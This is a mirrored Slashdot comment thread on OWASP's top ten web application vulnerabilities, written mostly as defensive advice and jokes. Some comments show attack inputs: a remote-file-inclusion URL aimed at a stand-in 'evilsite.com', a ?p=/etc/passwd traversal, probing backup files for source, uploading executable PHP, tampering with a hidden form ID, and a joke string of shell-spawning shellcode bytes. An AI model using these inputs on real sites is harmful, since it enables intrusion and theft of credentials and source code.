Slashdot Mirror

← Back to Stories (view on slashdot.org)

Top 10 Vulnerabilities in Web Applications

Posted by Hemos on from the learning-from-the-mistakes-of-others dept.

sverrehu writes "The Open Web Application Security Project (OWASP) has released a well-written document that is a must read for every web programmer out there. This security document is not about firewalls, encryption and patching. It's about common, highly exploitable errors made by the application programmers. Pick up your copy of "The Ten Most Critical Web Application Security Vulnerabilities" from the OWASP web site."

31 of 229 comments (clear)

  1. Open Source Needs People to Reuse code by Anonymous Coward · · Score: 5, Insightful

    One thing I notice is the large numbers of people who keep making the same require() or include() mistakes in php which allow attackers to run remote code. If you look at the relevant full disclosure lists there are several of these posted every week - Scanning tools like the Qualys Scanner spend a large amount of time looking for these easily preventable bugs - there must be thousands of these.

    Make open source more secure, share your experience, police each other, make M$ security look bad. When you make a security fix in code make sure you comment it - someone is probably going to copy it as an example. Don't let mistakes or inexperience spread.

    1. Re:Open Source Needs People to Reuse code by oliverthered · · Score: 4, Insightful

      I aggree, but what need to hapen first is good use of design patterns (Active X/Com on linux would make code easy to reuse).

      Most people write their own code because either
      1: the interface to somone else code is clumsy.
      2: They can't find the code there looking for
      3: The codes poorly documented, both inters of design and API.
      4: Because of the above potential hastles it's quicker.

      As a good exmaple there are two UHCI implementations in the 2.4 kernel usb-uhci which has crap code but works and uhci which has nice code and doesn't work that well.
      A lot of the functionality is re-implemented in the OHCI module (another USB protocol).

      This has been fixed in 2.5 though (but not fully intergrated with things like usnfs yet).

      --
      thank God the internet isn't a human right.
    2. Re:Open Source Needs People to Reuse code by szyzyg · · Score: 5, Informative

      I believe hes referring to this construct.
      a simple example of a bad include is

      include($theme . "theme.php");

      Basically is $theme isn't set then it uses some default theme, but alternate themese can be set in the url e.g.

      webpage.php?theme=brushedmetal

      now.....

      the reason this can be dangerous is that php can include files across http urls so I could go to the page with a URL like

      webpage.php?theme=http://evilsite.com/

      and on evilsite.com have a theme.php file which does something like

      So I get the password file spat back to me (obviously evilsite.com has to *not* run php otherwise you get the password file from evilsite.com).

      Make sure you sanitise those path variables, and if you don't need it disable 'allow_url_fopen' to avoid offsite scripts being used but local files can still be manipulated. Also 'register_globals' stops the user specifying global variables which will also prevent this and other bugs .

    3. Re:Open Source Needs People to Reuse code by e1en0r · · Score: 5, Interesting

      one of my favorites is index.php?p=blah.php where you can easily replace blah.php with something a little more interesting, such as /etc/passwd

      I've emailed several people notifying them of this problem but not one single person changed their code.

    4. Re:Open Source Needs People to Reuse code by e1en0r · · Score: 4, Interesting

      The same thing goes for backup file extensions, such as .php~. The first thing I do when I set up Apache is to make it parse those files as PHP just in case. You'd be amazed at how many peole have vulnerable files like that just lying around. Try looking for index.php~ and you can often find all kinds of stuff from there.

  2. Summary by robbyjo · · Score: 5, Insightful
    1. Unvalidated Parameters
    2. Broken access control
    3. Broken account and access management
    4. Cross-site scripting (XSS) flaws
    5. Buffer overflows
    6. Command injection flaws
    7. Error Handling problems
    8. Insecure use of cryptography
    9. Remote administration flaws
    10. Web and application misconfiguration

    --

    --
    Error 500: Internal sig error
    1. Re:Summary by bwalling · · Score: 5, Insightful

      Err, #1, #5, and #6 can be summarized as: Don't trust user input.

    2. Re:Summary by Anonvmous+Coward · · Score: 5, Interesting

      "While this is stuff that matters, it certainly isn't news. Folks have been making the same sloppy mistakes and careless oversights since AOL was trading at $140/share. (And that's a long time ago.)"

      I'm gonna haveta defend Slashdot here. It may not be news, but /. babbles on and on about security and rarely goes into detail like this about what we can do about it. I only picked up PHP a year ago and just from reading some of the posts here, I've gone back over code I've written to make sure I didn't make those mistakes.

      Just because it's not a new topic doesn't mean it's not new to some people. Frankly, I'd rather read old articles like this than the usual finger pointing at Microsoft.

    3. Re:Summary by ConceptJunkie · · Score: 4, Interesting

      A number of these are just common sense, applicable to all programming.

      I found a small software vendor who included the price in the URL of theproduct you are ordering. I was able to modify the prices in the shopping cart at will, of course I did not try to exploit that, but I e-mailed both the vendor and the people who made the shopping cart.

      Neother seemed particularly concerned. The vendor responded that all orders are eyeballed by people, problems wouldn't occur. I suppose if you changed all the prices to 1 cent, sure. But what if you just gave yourself a nice little discount?

      The fact of the matter is that a lot of developers (and even users) don't seem really concerned (at least until someone screws them over...).

      --
      You are in a maze of twisty little passages, all alike.
  3. Did you read that press release??!!?? by mcmonkey · · Score: 5, Funny

    "I like my web servers just like my women...insecure and full of holes waiting to be exploited." --Bill G.

  4. This is news? by Quasar1999 · · Score: 4, Insightful

    Come on, Microsoft has listed these problems for years now... in the form of Service packs and hot fix descriptions... Sure it wasn't in a bullet form list... but each description had at least one thing from the list...

    The real problem is lack of time to properly test code. Somehow in modern businesses, very little time is allocated to GOOD, extensive, useful testing for vulnerablities in apps.

    --

    ---
    Programming is like sex... Make one mistake and support it the rest of your life.
  5. quick reminder.. by Anonymous Coward · · Score: 5, Insightful

    ..to those who didnt bother to read the article, it has these lines in it:

    This security document is not about firewalls, encryption and patching. It's about common, highly exploitable errors made by the application programmers.

    which means every post thats about IIS, Micro$oft, m$, microshaft and god knows what other words you use to make you look like an idiotic open source fanatic with no sense of reality are offtopic.

  6. Wait just a minute! by Jonboy+X · · Score: 4, Funny

    So, you're telling me that I *shouldn't* write web apps with remote exploits, buffer overflows and generally crappy security?!?!? Well color me flabbergasted!

    --

    "In a 32-bit world, you're a 2-bit user. You've got your own newsgroup, alt.total.loser." -Weird Al
  7. Vulnerability #12 by RollingThunder · · Score: 5, Funny

    Having information potentially of interest to Slashdot.

  8. Post Parameters by ackthpt · · Score: 4, Interesting
    Top 10 Vulnerabilities in Web Applications

    This seems to be a moving target, though with the first vendor or platform that jumps to mind regarding vulnerabilities is a given. I'd say the root class is MicrosoftVulnerability and subclasses are Windows, Explorer, Outlook, Office, etc, all of which should be behind a firewall and virus/worm filters. Exposing an MS workstation to the internet is asking for it. However...

    On unixes (including BSD and Linux) there's been the danger of unexpected post commands on webservers, directory access, etc. When I coded a perl search engine, years ago I found I had to absolutely lock down what was accepted as parameters and subsequent values. Frequenly processes ran with root authority, to access all resources. Granted this was probably the fault of the admin, not wanting to devote time and effort to make all necessary resources available to a special account for scripts to run in. Does this hold true today? (Obviously directories are still frequently available, even on CNN :o)

    --

    A feeling of having made the same mistake before: Deja Foobar
  9. And of course, the obvious .... by Greedo · · Score: 5, Funny

    11. Getting Slashdotted

    --
    Tuus crepidae innexilis sunt.
  10. Missing by Anonymous Coward · · Score: 5, Funny

    A11 Link on Slashdot

    In spite of many alarming examples, the danger associated with having a link to your web site posted on the Slashdot front page continues to be underestimated by many developers of web applications. Neglect of this threat can cause your web server to actually burn through the floor of your computer building in a manner similar to nuclear meltdown.

  11. Relevant to everything: by White+Shade · · Score: 5, Insightful

    "The underlying reality is shameful: most system and Web application software is written oblivious to security principles, software engineering, operational implications, and indeed common sense."

    I think a lack of common sense is a problem which applies to almost everything. Judges, certain chip-manufacturing companies, certain companies preventing sales of their better (*cough*alpha*cough*) products, etc, all seem to suffer from this affliction.

    Another facet which the article may have neglected to mention is programmers who feel that they're better than the rest of their fellow programmers and so as a result they 'assume' that their software is inherently bug free, because obviously they could never write a buggy applcation.

    In the recent case of HP and the Alpha, it seems as though both conceit ('our new chips are better', while quietly ignoring the facts) and a lack of common sense ('hey, how bout we not sell our better and more lucrative product, cuz thatll be fun!') and a dose of good ol' fashioned stupidity are involved...

    Lack of common sense, conceit, and stupidity.. While the specifics of this article are clearly about web design, the overall lessons to be learned can, and should, be applied to technology, and life in general.

    It's about time common sense became a bit more deserving of the title, and maybe once that happens we won't have to read articles like this one.

    --
    ìì!
  12. a "a must read"? by farnsworth · · Score: 5, Insightful
    This is far from a "must read", it's good introduction to common mistakes junior developers/admins make with webapps. There's nothing in there that hasn't been covered before or is well-known to anyone who has even the least bit of real-world experience.

    It seems like good information and it's well-written, but it's hardly anything ground breaking.

    --

    There aint no pancake so thin it doesn't have two sides.

    1. Re:a "a must read"? by sverrehu · · Score: 5, Insightful

      My experience is different than yours. I've spent the two last years giving courses and lectures on exactly these topics to approximately 700 programmers in everything from small, 10-person companies, via banks, to large, international consulting companies. Far less then half of these experienced developers knew about SQL Injection. Next to none fully understood Cross-site-Scripting-based session hijacking.

      I used to spend some late evenings looking for symptomes of SQL Injection and Cross-site Scripting (two of the vulnerabilities most easily detected from the outside without doing something really intrusive). I have a list of 170 sites, including banks and web shops that have symptoms on these problems. That's about half of the sites I've checked.

      I've skimmed book upon book on "building E-commerce solutions", and every single one of them contains examples with unintended security holes in them. Even books on web application security contains examples that are vulnerable.

      So, I strongly disagree with you. In my experience, most web application programmers know next to nothing about these problems.

  13. READ THE PDF! by Wakkow · · Score: 5, Insightful

    Don't just scan the summary.. There's nothing that special about the top 10. Read the PDF which actually explains each item, giving examples and what to do about it. That is what makes the site worth looking at.

  14. The forgot a very big one... by TheTomcat · · Score: 5, Interesting

    Unfortunately, they forgot:

    -Application allows user to upload a file (attachment, image, etc) somewhere into the webroot.
    -Instead of sending a .jpg, the application allows the user to upload a file of any name.
    -User uploads "mail_me_your_sources.php", or similar
    -This upload becomes executable, user has control of server

    S

    1. Re:The forgot a very big one... by pclminion · · Score: 4, Informative
      You made my mind zoom back to a web project I did in college. Did we make the same mistake?

      No. Turns out we were stashing user-uploaded files as blobs in the DB, not as actual files in the webroot. If someone uploaded a PHP file, and then tried to view it, the server would set Content-Type as a JPG image, and the user would probably either see garbage or the actual PHP source.

  15. Here's an Example by oni · · Score: 5, Informative

    Here's a quick and language independent example of how easy it is to miss a security hole in a web application: Say you've created a message board with the ability to edit posts. When a user clicks the edit button they get a form with a textarea to type in and the messageID as a hidden field. When they submit the form you do something like this in SQL:

    UPDATE forum
    SET comment = form.comment
    WHERE messageID = form.messageID

    Do you see the error there? I can edit the form to send a different messageID and change any comment I want. The solution?

    WHERE messageID = form.messageID AND userID = cookie.userID

    Because HTML is stateless, you have to authenticate the user on every hit and use that authenticated identity as part of every database action. How you do that is a subject unto itself!

    At any rate, I just wanted to show how easy it is to introduce a serious security flaw into a web application. The only countermeasure is competent, careful coding.

    1. Re:Here's an Example by GigsVT · · Score: 5, Insightful

      WHERE messageID = form.messageID AND userID = cookie.userID

      Yeah, it's a good thing users can't edit the cookies that are stored on their hard disk..... oh wait.

      To do something like this securely, give the user a unique session ID and put only that in the cookie. Then manage all their session data on the server side. That's what PHP does.

      --
      I've had enough abrasive sigs. Kittens are cute and fuzzy.
  16. How to do it, and how to protect against it... by 3ryon · · Score: 4, Informative

    The article is just a summary. If you want to know more check out: Hacking Web Solutions Exposed

    --
    Kind thoughts do not change the world
  17. Well known, but not easy to do . . . . by djembe2k · · Score: 5, Insightful
    Yes, all of these vulnerabilities are well known, but the reason that they are common mistakes is because it is so much easier to make them than to avoid them. Making people aware of them isn't the same as instructing people in how to avoid them.

    While the list is (appropriately) in OS-neutral and scripting language-neutral terms, the way to correct these problems is specific to the OS, webserver and scripting langauge you are using. So the next question is: what are the resources for addressing these issues, specifically, for particular OSes, webservers and languages?

    For those taking the MS approach (and flame it if you want, but IIS isn't about to stop being the #2 web server overnight, so it might as well be done as securely as possible), I can recommend the following two guides from SANS:

    Securing Internet Information Server

    and

    Windows 2000/XP Scripting For Security

    These are listed as "course books" on their site, but they stand alone as guides for those who already have some background and knowledge. And if you don't have much background and knowledge, SANS courses are very good. (In fact, just about everything at the SANS website is valuable for the IT professional who wants to know more about security -- which ought to be all of us.)

    So, stop just posting that these 10 problems are old news, and post the resources you use (or learned from) to avoid these problems yourself on your platform of choice, so the many (majority?) still making these mistakes can learn to avoid them too.

  18. Re:My top 10 list by CaffeineAddict2001 · · Score: 5, Funny

    You forgot:

    11. Buffer Overfloooooooooooooooooooooooooooooooooooooooooooo oooooooooooooooooooooooooooooooooooooooooooooooooo oooooooooooooooooooooooooooooooooooooooooooooooooo oooooooooooooooooooooooooooooooooooooooooooooooooo oooooooooooooooooooooooooooooooooooooooooooooooooo oooooooooows\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x 2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0 \x0b\xcd\x80

    root#

  19. Re:Vulnerability #11 by The+Bungi · · Score: 5, Funny
    It's funny because Microsoft = bad!
    P.S. They also like money!!

    Welcome to Slashdot. A few pointers:

    • When referring to The Evil Empire, please use '$' instead of 's'. This holds true even if your currency symbol happens to be different as we are USA centric here.
    • When using operator overloading to make a point, please use C syntax, as C is the language of the 1337 h^x0r. The statement above is assigning bad to Micro[$]oft instead of testing for equality. Thus, the syntax should be Micro[$]oft == bad!. In most cases, syntactical errors like these will get you tagged as a BASIC programmer, which is a Bad Thing (TM)
    • When using more than one exclamation sign at the end of a sentence related to Micro[$]oft, please use the normative money!!1! syntax by inserting a gratuitous 1 (one) character.
    Other than that, please feel free to explore the site. Check out the journal features and keep that karma ticker open at all times.

    Thanks!

  20. The problem: web programming is easy by Anonymous Coward · · Score: 4, Insightful

    I've read it here many times: "web programming is easy, it's not like real programming". The problem is that managers and decision makers also read this kind of un-informed statement.

    The truth is that it is easy to get something going on a website, but it is hard to get something that works well and is secure. The amount of time it takes to transform an interesting web demo to a well executed web application is staggering. It is also very hard to explain why all that time is needed. What happens is that web application get launched half-baked. If a company is lucky, the application will only annoy the users, if a company is unlucky, someone will walk right in through a common security hole and comprimise the whole application.

    Moral to managers and project planners: believe your programmers when they tell you that there is more then meets the eye in developing web applications.

  21. also dangerous: by Fuzzums · · Score: 4, Insightful

    - having foo.php.bak files.
    if these files access databases or contain other passwords they're likely to be visible in the .bak file.

    - .inc files.
    same probmen if .inc isn't parsed or blocked in any way.

    --
    Privacy is terrorism.